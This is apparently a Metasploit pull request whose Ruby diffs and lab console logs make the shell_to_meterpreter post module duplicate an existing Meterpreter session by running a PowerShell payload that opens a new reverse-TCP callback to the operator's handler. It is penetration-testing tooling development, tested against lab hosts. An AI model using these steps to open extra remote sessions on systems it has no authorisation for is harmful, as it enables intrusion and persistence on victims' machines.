### PR TITLE
Open a new Meterpreter session when trying to upgrade Meterpreter

### DIFF
--- a/lib/msf/core/post/common.rb
+++ b/lib/msf/core/post/common.rb
@@ -114,7 +114,12 @@ module Msf::Post::Common
         'Channelized' => true,
         'Subshell' => true
       }.merge(opts)
-      o = session.sys.process.capture_output(cmd, args, opts, time_out)
+
+      if opts['Channelized']
+        o = session.sys.process.capture_output(cmd, args, opts, time_out)
+      else
+        session.sys.process.execute(cmd, args, opts)
+      end
     when 'powershell'
       if args.nil? || args.empty?
         o = session.shell_command("#{cmd}", time_out)

--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Post
         'License' => MSF_LICENSE,
         'Author' => ['Tom Sellers <tom [at] fadedcode.net>'],
         'Platform' => [ 'linux', 'osx', 'unix', 'solaris', 'bsd', 'windows' ],
-        'SessionTypes' => [ 'shell' ]
+        'SessionTypes' => [ 'shell', 'meterpreter' ]
       )
     )
     register_options(
@@ -53,11 +53,6 @@ class MetasploitModule < Msf::Post
   # Run method for when run command is issued
   def run
     print_status("Upgrading session ID: #{datastore['SESSION']}")
-
-    if session.type == 'meterpreter'
-      print_error('Meterpreter sessions cannot be upgraded any higher')
-      return nil
-    end
 
     # Try hard to find a valid LHOST value in order to
     # make running 'sessions -u' as robust as possible.
@@ -181,7 +176,7 @@ class MetasploitModule < Msf::Post
           cmd_exec("echo. | #{cmd_psh_payload(payload_data, psh_arch, psh_opts)}")
         else
           psh_opts[:remove_comspec] = true
-          cmd_exec(cmd_psh_payload(payload_data, psh_arch, psh_opts))
+          cmd_exec(cmd_psh_payload(payload_data, psh_arch, psh_opts), nil, 15, { 'Channelized' => false })
         end
       else
         print_error('Powershell is not installed on the target.') if datastore['WIN_TRANSFER'] == 'POWERSHELL'


### PR DESCRIPTION
This PR allows you to run `sessions -u -1` on a Meterpreter session to duplicate it.

## Verification

- [ ] Start `msfconsole`
- [ ] `use` a Meterpreter payload, such as `payload/windows/x64/meterpreter/reverse_tcp`
- [ ] Get a session
- [ ] **Verify** that doing `sessions -u -1` will duplicate the Meterpreter session
- [ ] **Verify** that when interacting with the duplicated session and exiting it, it closes correctly
- [ ] **Verify** that the first session can still be interacted with as normal.
- [ ] **Verify** that the duplicated session can also be upgraded with `sessions -u -1`

You can also use `setg sessiontlvlogging console/true` to ensure that closing or interacting with a duplicated session sends TLV traffic as expected. 

## payload/windows/x64/meterpreter/reverse_tcp

### Before
Can't upgrade/duplicate session.

<details>
<summary>After</summary>

```
msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions

Active sessions
===============

No active sessions.

msf6 payload(windows/x64/meterpreter/reverse_tcp) >
[*] Sending stage (200262 bytes) to 192.168.129.131
[*] Meterpreter session 1 opened (192.168.129.1:4444 -> 192.168.129.131:49739 ) at 2022-03-22 10:45:17 +0000

msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions

Active sessions
===============

  Id  Name  Type                     Information                              Connection
  --  ----  ----                     -----------                              ----------
  1         meterpreter x64/windows  DESKTOP-T5PBUMF\simon @ DESKTOP-T5PBUMF  192.168.129.1:4444 -> 192.168.129.131:49739  (192.168.129.131)

msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -u -1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [-1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.129.1:4433
msf6 payload(windows/x64/meterpreter/reverse_tcp) >
[*] Sending stage (200262 bytes) to 192.168.129.131
[*] Meterpreter session 2 opened (192.168.129.1:4433 -> 192.168.129.131:49740 ) at 2022-03-22 10:45:38 +0000
[*] Stopping exploit/multi/handler

msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions

Active sessions
===============

  Id  Name  Type                     Information                              Connection
  --  ----  ----                     -----------                              ----------
  1         meterpreter x64/windows  DESKTOP-T5PBUMF\simon @ DESKTOP-T5PBUMF  192.168.129.1:4444 -> 192.168.129.131:49739  (192.168.129.131)
  2         meterpreter x64/windows  DESKTOP-T5PBUMF\simon @ DESKTOP-T5PBUMF  192.168.129.1:4433 -> 192.168.129.131:49740  (192.168.129.131)
```

</details>

## payload/linux/x64/meterpreter_reverse_tcp

### Before
Can't upgrade/duplicate session.

<details>
<summary>After</summary>

```
msf6 payload(linux/x64/meterpreter_reverse_tcp) > sessions -u -1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [-1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.129.1:4433
[*] Sending stage (989032 bytes) to 192.168.129.161
[*] Meterpreter session 2 opened (192.168.129.1:4433 -> 192.168.129.161:35778 ) at 2022-03-22 14:14:00 +0000
[*] Command stager progress: 100.00% (773/773 bytes)
msf6 payload(linux/x64/meterpreter_reverse_tcp) >
msf6 payload(linux/x64/meterpreter_reverse_tcp) > sessions

Active sessions
===============

  Id  Name  Type                   Information             Connection
  --  ----  ----                   -----------             ----------
  1         meterpreter x64/linux  kali @ 192.168.129.161  192.168.129.1:4444 -> 192.168.129.161:51226  (192.168.129.161)
  2         meterpreter x86/linux  kali @ 192.168.129.161  192.168.129.1:4433 -> 192.168.129.161:35778  (192.168.129.161)
```
</details>

## payload/java/meterpreter/reverse_tcp
### Windows

<details>
<summary>After</summary>

```
msf6 payload(java/meterpreter/reverse_tcp) >
[*] Sending stage (58847 bytes) to 192.168.129.131
[*] Meterpreter session 3 opened (192.168.129.1:4444 -> 192.168.129.131:49751 ) at 2022-03-22 14:26:46 +0000
sessions

Active sessions
===============

  Id  Name  Type                      Information              Connection
  --  ----  ----                      -----------              ----------
  3         meterpreter java/windows  simon @ DESKTOP-T5PBUMF  192.168.129.1:4444 -> 192.168.129.131:49751  (192.168.129.131)

msf6 payload(java/meterpreter/reverse_tcp) > sessions -u -1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [-1]

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_sys_process_kill
[*] Upgrading session ID: 3
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.129.1:4433
msf6 payload(java/meterpreter/reverse_tcp) >
[*] Sending stage (200262 bytes) to 192.168.129.131
[*] Meterpreter session 4 opened (192.168.129.1:4433 -> 192.168.129.131:49752 ) at 2022-03-22 14:27:01 +0000
[*] Stopping exploit/multi/handler

msf6 payload(java/meterpreter/reverse_tcp) > sessions

Active sessions
===============

  Id  Name  Type                      Information                              Connection
  --  ----  ----                      -----------                              ----------
  3         meterpreter java/windows  simon @ DESKTOP-T5PBUMF                  192.168.129.1:4444 -> 192.168.129.131:49751  (192.168.129.131)
  4         meterpreter x64/windows   DESKTOP-T5PBUMF\simon @ DESKTOP-T5PBUMF  192.168.129.1:4433 -> 192.168.129.131:49752  (192.168.129.131)
```

</details>

### Linux

<details>
<summary>After</summary>

```
msf6 payload(java/meterpreter/reverse_tcp) > [*] Sending stage (58847 bytes) to 192.168.129.161
[*] Meterpreter session 1 opened (192.168.129.1:4444 -> 192.168.129.161:51236 ) at 2022-03-22 14:24:13 +0000

msf6 payload(java/meterpreter/reverse_tcp) > sessions

Active sessions
===============

  Id  Name  Type                    Information  Connection
  --  ----  ----                    -----------  ----------
  1         meterpreter java/linux  kali @ kali  192.168.129.1:4444 -> 192.168.129.161:51236  (192.168.129.161)

msf6 payload(java/meterpreter/reverse_tcp) > sessions -u -1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [-1]

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_sys_process_kill
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.129.1:4433
[*] Sending stage (989032 bytes) to 192.168.129.161
[*] Meterpreter session 2 opened (192.168.129.1:4433 -> 192.168.129.161:35780 ) at 2022-03-22 14:24:27 +0000
sessions
[*] Command stager progress: 100.00% (773/773 bytes)
msf6 payload(java/meterpreter/reverse_tcp) > sessions

Active sessions
===============

  Id  Name  Type                    Information             Connection
  --  ----  ----                    -----------             ----------
  1         meterpreter java/linux  kali @ kali             192.168.129.1:4444 -> 192.168.129.161:51236  (192.168.129.161)
  2         meterpreter x86/linux   kali @ 192.168.129.161  192.168.129.1:4433 -> 192.168.129.161:35780  (192.168.129.161)
```

</details>